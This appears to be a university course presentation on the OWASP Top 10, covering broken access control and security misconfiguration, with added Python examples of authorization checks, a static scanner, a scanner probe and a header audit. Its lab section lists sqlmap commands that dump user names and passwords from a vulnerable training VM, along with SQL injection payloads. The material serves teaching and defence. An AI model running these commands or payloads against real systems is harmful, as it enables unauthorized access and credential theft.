
Information Security – Standards and Best Practices

Presented by:
OWASP
Supervisor & Professor:
Imad Boustany
Jean-Michel Kaoukabani

INCI – M2: Information Security OWASP Page 1


Who is the OWASP foundation?

The Open Web Application Security Project® (OWASP) is a nonprofit foundation that works to improve the security of software.


TOP 10 VULNERABILITIES


Broken Access Control
What is it?

Access control enforces policy such that users cannot act outside of their intended permissions. When it is broken, attackers reach functionality they are not authorized for, in order to access other users' accounts, view sensitive files, modify other users' data, change access rights, etc.


Broken Access Control
Threat Agents / Attack Vectors

Exploitation of access control is a core skill of attackers. SAST and DAST tools can detect the absence of access control but cannot verify that it is functional when it is present.


Broken Access Control
Security Weakness

Access control weaknesses are common due to the lack of automated detection and the lack of effective functional testing by application developers.


Broken Access Control
Impacts

The technical impact is attackers acting as users or administrators, or ordinary users using privileged functions they should not have, including creating, reading, updating or deleting every record.


Broken Access Control
Common Access Control Vulnerabilities

• Bypassing access control checks by modifying the URL (parameter tampering or force browsing), internal application state or the HTML page, or by modifying API requests with an attack tool.
• Viewing or editing someone else's account by supplying its unique identifier (insecure direct object reference).
• Elevation of privilege: acting as a user without being logged in, or as an admin when logged in as a user.
• Metadata manipulation, such as replaying or tampering with a JSON Web Token (JWT), a cookie or a hidden field.
• CORS misconfiguration that allows API access from unauthorized or untrusted origins.
• Force browsing to authenticated pages as an unauthenticated user, or to privileged pages as a standard user.


Broken Access Control
How to prevent?

• With the exception of public resources, deny by default.
• Implement access control mechanisms once and re-use them throughout the application, including minimizing CORS usage.
• Access control models should enforce record ownership rather than accepting that the user can create, read, update or delete any record.
• Log access control failures and alert administrators when appropriate (e.g. repeated failures).
• Disable web server directory listing and ensure file metadata (e.g. .git) and backup files are not present within web roots.


Broken Access Control
Different types of access control

• Discretionary Access Control (DAC)
• Mandatory Access Control (MAC)
• Role Based Access Control (RBAC)
• Attribute Based Access Control (ABAC)
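The prevention rules (deny by default, one reusable mechanism, record ownership, logging of failures) and the RBAC/ABAC models above, put together in one authorisation choke point. This is an added example written for this page, not OWASP code; the User/Document model, the role names and the sample rows are assumptions. The insecure lookup shows the "modify the URL" case: changing the id in the request returns another user's record because existence is the only check.

```python
"""Centralised, deny-by-default authorisation (added example, not OWASP code).

Assumed model: users carry roles (RBAC) and documents carry an owner
(an ownership attribute, ABAC-style). The policy is defined once and
reused by every handler; every denial is logged."""
import logging
from dataclasses import dataclass

log = logging.getLogger("authz")
logging.basicConfig(level=logging.WARNING, format="%(levelname)s %(message)s")


@dataclass(frozen=True)
class User:
    id: int
    roles: frozenset = frozenset()


@dataclass(frozen=True)
class Document:
    id: int
    owner_id: int


# Constructed sample data standing in for a database table.
DOCS = {
    1: Document(id=1, owner_id=10),
    2: Document(id=2, owner_id=20),
}

# Policy: action -> rule(user, doc) -> bool. Any action not listed is denied.
POLICY = {
    "read":   lambda u, d: "admin" in u.roles or u.id == d.owner_id,
    "delete": lambda u, d: "admin" in u.roles or u.id == d.owner_id,
    "audit":  lambda u, d: "auditor" in u.roles or "admin" in u.roles,
}


class Forbidden(Exception):
    pass


def authorize(user, action, doc):
    """Single choke point: unauthenticated -> deny, unknown action -> deny,
    rule false -> deny. Failures are logged with enough context to alert on."""
    if user is None:                                    # force browsing by an anonymous client
        log.warning("DENY anon action=%s doc=%s", action, doc.id)
        raise Forbidden(action)
    rule = POLICY.get(action)
    if rule is None or not rule(user, doc):
        log.warning("DENY user=%s roles=%s action=%s doc=%s",
                    user.id, sorted(user.roles), action, doc.id)
        raise Forbidden(action)


def get_document_insecure(doc_id):
    """The broken pattern: the only 'check' is that the row exists, so
    changing ?id=1 to ?id=2 in the URL returns another user's record."""
    return DOCS[doc_id]


def get_document(user, doc_id):
    """Hardened: look the record up, then enforce ownership/role via authorize()."""
    doc = DOCS.get(doc_id)
    if doc is None:
        return None
    authorize(user, "read", doc)
    return doc


def can(user, action, doc_id):
    """Boolean wrapper for templates and tests; reuses the same policy."""
    doc = DOCS.get(doc_id)
    if doc is None:
        return False
    try:
        authorize(user, action, doc)
        return True
    except Forbidden:
        return False


if __name__ == "__main__":
    alice = User(10, frozenset({"user"}))
    bob = User(20, frozenset({"user"}))
    root = User(1, frozenset({"admin"}))
    print("insecure lookup of alice's doc by anyone:", get_document_insecure(1))
    print("bob reads doc 1:", can(bob, "read", 1))        # False: not owner
    print("alice reads doc 1:", can(alice, "read", 1))    # True: owner
    print("admin deletes doc 2:", can(root, "delete", 2)) # True: role
    print("anon reads doc 1:", can(None, "read", 1))      # False: unauthenticated
    print("alice exports doc 1:", can(alice, "export", 1))# False: no rule, deny by default
```

Returning None for an unknown id keeps "does not exist" and "not yours" distinguishable in the handler; if enumeration of ids is a concern, map both to the same 404 at the HTTP layer.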


Broken Access Control
LAB: SQL Injection using Vega against OWASP BWA (Broken Web Applications VM)


SQLMAP TOOL ON KALI LINUX (run against the injectable `user` parameter of the OWASP Bricks content-2 page; enumerate databases, then users, tables, columns, and finally dump the interesting columns):

• sqlmap -u "http://192.168.155.143/owaspbricks/content-2/index.php?user=harry" --dbs
• sqlmap -u "http://192.168.155.143/owaspbricks/content-2/index.php?user=harry" --dbms=mysql --users
• sqlmap -u "http://192.168.155.143/owaspbricks/content-2/index.php?user=harry" -D bricks --tables
• sqlmap -u "http://192.168.155.143/owaspbricks/content-2/index.php?user=harry" -D bricks -T users --columns
• sqlmap -u "http://192.168.155.143/owaspbricks/content-2/index.php?user=harry" -D bricks -T users -C name,password,email --dump
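What the lab's injectable `user` parameter looks like in code, and the fix. This is an added example written for this page, not the OWASP Bricks source: an in-memory SQLite table with constructed rows stands in for the MySQL `bricks.users` table, the vulnerable function builds the query by string formatting the way the lab page does, and the fixed one binds the value as a parameter. The two payloads are of the kind sqlmap tries first.

```python
"""String-concatenated SQL versus a bound parameter (added example, not
OWASP Bricks code). Table and rows are constructed for the demo."""
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT, email TEXT)")
conn.executemany(
    "INSERT INTO users VALUES (?, ?, ?)",
    [("harry", "hpwd", "harry@example.test"),   # constructed sample rows
     ("tom", "tpwd", "tom@example.test"),
     ("ron", "rpwd", "ron@example.test")],
)


def lookup_vulnerable(user):
    """Mirrors index.php?user=...: the input becomes part of the SQL text."""
    sql = "SELECT name, email FROM users WHERE name = '%s'" % user
    return conn.execute(sql).fetchall()


def lookup_safe(user):
    """Same query with a placeholder: the driver sends the value separately,
    so quotes inside `user` can never change the statement's structure."""
    return conn.execute("SELECT name, email FROM users WHERE name = ?", (user,)).fetchall()


# Payloads: a tautology that matches every row, and a UNION that pulls
# the password column into the result set (what `--dump` automates).
TAUTOLOGY = "harry' OR '1'='1"
UNION = "x' UNION SELECT name, password FROM users-- "

if __name__ == "__main__":
    print(lookup_vulnerable("harry"))      # one row, as intended
    print(lookup_vulnerable(TAUTOLOGY))    # all three rows
    print(lookup_vulnerable(UNION))        # (name, password) for every user
    print(lookup_safe(TAUTOLOGY))          # []
    print(lookup_safe(UNION))              # []
```

The `-- ` at the end of the UNION payload comments out the trailing quote the application appends; the trailing space matters for MySQL, which requires whitespace after `--`.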


Broken Access Control
SAST: Static Application Security Testing

Designed to analyze source code or compiled versions of code to help find security flaws, without running the application.


Broken Access Control
SAST: Static Application Security Testing / Strengths and Weaknesses

Strengths:
• Scales well.
• Output is good for developers (file and line of the finding).

Weaknesses:
• Many types of security vulnerabilities are difficult to find automatically.
• High numbers of false positives.
• Many of these tools have difficulty analyzing code that can't be compiled.
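A miniature SAST pass in the style of a Bandit plugin, to show what "analyze source code" means in practice and where the false positives come from. This is an added example written for this page, not Bandit's code; the sample source it scans is constructed. It parses Python with the standard-library ast module and flags two patterns: subprocess calls with shell=True and calls to eval(). The second finding is the false-positive case: shell=True with a constant command is reported like the injectable one, because a static tool cannot see where a value comes from at runtime; the best it can do is lower the severity when the command is a literal.

```python
"""Bandit-style AST scan (added example, not Bandit's code)."""
import ast

# Constructed sample: one real command injection, one constant command, one eval.
SAMPLE = '''
import subprocess

def run_user_cmd(cmd):
    return subprocess.call("ls " + cmd, shell=True)   # command injection

def disk_usage():
    return subprocess.check_output("df -h", shell=True)  # constant command

def calc(expr):
    return eval(expr)
'''


def _callee_name(node):
    """'subprocess.call' or 'eval' for a Call node; '' for anything else."""
    f = node.func
    if isinstance(f, ast.Attribute) and isinstance(f.value, ast.Name):
        return f"{f.value.id}.{f.attr}"
    if isinstance(f, ast.Name):
        return f.id
    return ""


def scan(source):
    """Return sorted findings: (line, rule_id, severity, message)."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        name = _callee_name(node)
        if name.startswith("subprocess."):
            shell = next((kw.value for kw in node.keywords if kw.arg == "shell"), None)
            if isinstance(shell, ast.Constant) and shell.value is True:
                first = node.args[0] if node.args else None
                const = isinstance(first, ast.Constant)   # literal command -> likely false positive
                findings.append((node.lineno, "SHELL_TRUE", "LOW" if const else "HIGH",
                                 f"{name} with shell=True and a "
                                 f"{'constant' if const else 'non-constant'} command"))
        elif name == "eval":
            findings.append((node.lineno, "EVAL", "MEDIUM", "use of eval()"))
    return sorted(findings)


if __name__ == "__main__":
    for line, rule, sev, msg in scan(SAMPLE):
        print(f"line {line}: [{sev}] {rule}: {msg}")
```

Running real Bandit over the same file is `bandit -r <path>`; the point of the toy is that every rule is a syntactic pattern, which is exactly why a missing authorization check (no pattern to match) is out of reach for this class of tool.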


Broken Access Control
SAST: Bandit tool



Broken Access Control
SAST: HuskyCI



Broken Access Control
DAST: Dynamic Application Security Testing

Web application vulnerability scanners are automated tools that scan a running web application from the outside, without access to its source, to look for security vulnerabilities such as cross-site scripting, SQL injection and insecure server configuration.
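The black-box technique behind Vega and Burp's active scanner, reduced to its essence: inject a payload into each parameter and judge only the response. This is an added example written for this page, not Vega's or Burp's code. The target is a constructed in-process handler standing in for GET /search?q=...&user=...; a real scanner would send the same requests over HTTP. The hardened handler shows the scan coming back clean once output encoding and bound parameters are in place, which is how a DAST run doubles as a regression test.

```python
"""Minimal DAST probe for reflected XSS and error-based SQLi
(added example, not Vega's or Burp's code)."""
import html
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (name TEXT)")
db.executemany("INSERT INTO users VALUES (?)", [("harry",), ("tom",)])  # constructed rows


def vulnerable_app(params):
    """q is reflected unescaped (XSS); user is concatenated into SQL (SQLi)
    and database errors are returned to the client."""
    q = params.get("q", "")
    user = params.get("user", "")
    try:
        rows = db.execute("SELECT name FROM users WHERE name = '%s'" % user).fetchall()
    except sqlite3.Error as err:
        return 500, f"<p>Database error: {err}</p>"
    return 200, f"<p>Results for {q}: {rows}</p>"


def fixed_app(params):
    """Output encoding for q, a bound parameter for user, a generic error page."""
    q = html.escape(params.get("q", ""))
    user = params.get("user", "")
    try:
        rows = db.execute("SELECT name FROM users WHERE name = ?", (user,)).fetchall()
    except sqlite3.Error:
        return 500, "<p>Internal error</p>"
    return 200, f"<p>Results for {q}: {rows}</p>"


XSS_PAYLOAD = "<dast7>"     # unique tag, so a reflection is unambiguous
SQLI_PAYLOAD = "'"          # a lone quote breaks string-concatenated SQL
SQL_ERROR_SIGNS = ("syntax error", "unrecognized token", "mysql", "ORA-", "pg_query")


def scan(app, base_params):
    """Inject into each parameter in turn; return (vuln_class, parameter) pairs."""
    findings = []
    for name, value in base_params.items():
        status, body = app(dict(base_params, **{name: XSS_PAYLOAD}))
        if XSS_PAYLOAD in body:                       # echoed raw, not encoded
            findings.append(("XSS", name))
        status, body = app(dict(base_params, **{name: value + SQLI_PAYLOAD}))
        if status >= 500 or any(s.lower() in body.lower() for s in SQL_ERROR_SIGNS):
            findings.append(("SQLI", name))
    return findings


if __name__ == "__main__":
    base = {"q": "harry", "user": "harry"}
    print("vulnerable:", scan(vulnerable_app, base))   # [('XSS', 'q'), ('SQLI', 'user')]
    print("fixed:", scan(fixed_app, base))             # []
```

Note what the scanner cannot see: it reports the SQLi only because the error reached the client. With errors suppressed it would need timing or boolean-based probes, which is why DAST misses silent flaws and, as the earlier slide says, cannot tell whether an access control that is present actually works.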


Broken Access Control
DAST: Vega



Broken Access Control
DAST: Burp Suite



Broken Access Control
DAST: Vega vs Burp Suite (From Benchmark)



Security Misconfiguration
What is it?

• Missing security hardening or incorrect permissions on the application or server.
• Unnecessary features, services or ports are enabled.
• Default accounts and passwords are still enabled.
• Error handling leaks stack traces or other detailed messages to users.
• The latest security features are left disabled or misconfigured.
• Insecure configuration in the web application or server frameworks.
• Lack of security headers.


Security Misconfiguration
How common is it?

• Quite common, because it covers so many areas of a system.
• Common where deployment is manual rather than automated and repeatable.
• Exists across many systems and in many different forms.


Security Misconfiguration
Directory Listing



Security Misconfiguration
Detailed errors



Security Misconfiguration
SSL Labs Checking



Security Misconfiguration
Security Headers



Security Misconfiguration
How to fix it?

• A consistent, repeatable process for server and application hardening.
• Start from a minimal platform and add only the features that are needed.
• Regular review of new vulnerabilities and of patch status.
• Segmentation of systems to reduce the impact of a single misconfiguration.
• Automated and online server checks (e.g. SSL Labs, securityheaders.com) as part of deployment.
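An offline version of the checks that securityheaders.com and a hardening checklist perform, covering the items from the "What is it?" list and the Directory Listing, Detailed errors and Security Headers slides. This is an added example written for this page, not those services' code. It audits a constructed HTTP response (status, headers, body) for missing or weak security headers, version banners, directory listing and detailed error pages; the header baseline and the one-year HSTS minimum are assumptions, not OWASP-mandated values.

```python
"""Response hardening audit (added example; not securityheaders.com or SSL Labs code)."""
import re


def _hsts_ok(value):
    m = re.search(r"max-age=(\d+)", value)
    return bool(m) and int(m.group(1)) >= 31536000        # one year, assumed baseline


# (header, validator for a present value, message if missing or weak)
HEADER_CHECKS = [
    ("strict-transport-security", _hsts_ok, "missing or max-age below one year"),
    ("content-security-policy", lambda v: "unsafe-inline" not in v, "missing or allows 'unsafe-inline'"),
    ("x-content-type-options", lambda v: v.strip().lower() == "nosniff", "missing or not 'nosniff'"),
    ("x-frame-options", lambda v: v.strip().upper() in ("DENY", "SAMEORIGIN"), "missing or not DENY/SAMEORIGIN"),
    ("referrer-policy", lambda v: True, "missing"),
]
LEAKY_HEADERS = ("server", "x-powered-by", "x-aspnet-version")


def audit(status, headers, body):
    """Return (kind, detail) findings for one response."""
    h = {k.lower(): v for k, v in headers.items()}
    findings = []
    for name, ok, msg in HEADER_CHECKS:
        if name not in h or not ok(h[name]):
            findings.append(("HEADER", f"{name}: {msg}"))
    for name in LEAKY_HEADERS:                  # a product name is tolerable, a version is not
        if name in h and re.search(r"\d", h[name]):
            findings.append(("BANNER", f"{name} reveals a version: {h[name]}"))
    if re.search(r"<title>\s*Index of /", body, re.I):
        findings.append(("DIRLIST", "directory listing enabled"))
    if status >= 500 and re.search(r"Traceback|Stack trace|Fatal error|Exception", body):
        findings.append(("ERROR", "detailed error page returned to the client"))
    return findings


# Constructed responses: a default install, a PHP error page, and a hardened server.
WEAK = (200,
        {"Server": "Apache/2.4.29 (Ubuntu)", "X-Powered-By": "PHP/7.2.24", "Content-Type": "text/html"},
        "<html><head><title>Index of /backup</title></head><body>db.sql.bak</body></html>")
ERROR_PAGE = (500,
              {"Server": "Apache"},
              "<b>Fatal error</b>: Uncaught PDOException: SQLSTATE[HY000] [1045] Access denied "
              "for user 'root'@'localhost' in /var/www/html/db.php:7")
HARDENED = (200,
            {"Strict-Transport-Security": "max-age=31536000; includeSubDomains",
             "Content-Security-Policy": "default-src 'self'",
             "X-Content-Type-Options": "nosniff",
             "X-Frame-Options": "DENY",
             "Referrer-Policy": "strict-origin-when-cross-origin",
             "Server": "nginx"},
            "<html><body>ok</body></html>")

if __name__ == "__main__":
    for label, resp in (("weak", WEAK), ("error page", ERROR_PAGE), ("hardened", HARDENED)):
        print(label, audit(*resp))
```

The fixes on the server side are configuration, not code: on Apache `Options -Indexes` disables directory listing and `ServerTokens Prod` trims the banner; in PHP `display_errors = Off` (with logging to a file) stops the detailed error page; the headers themselves are one line each in the virtual host.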


References

• https://www.youtube.com/watch?v=tmPxTqi2vSs&feature=youtu.be
• https://owasp.org/
• https://sourceforge.net/projects/owaspbwa/
• https://portswigger.net/
• https://securityheaders.com/
• https://www.ssllabs.com/
• https://subgraph.com/vega/
• https://github.com/globocom/huskyCI
• https://pypi.org/project/bandit/
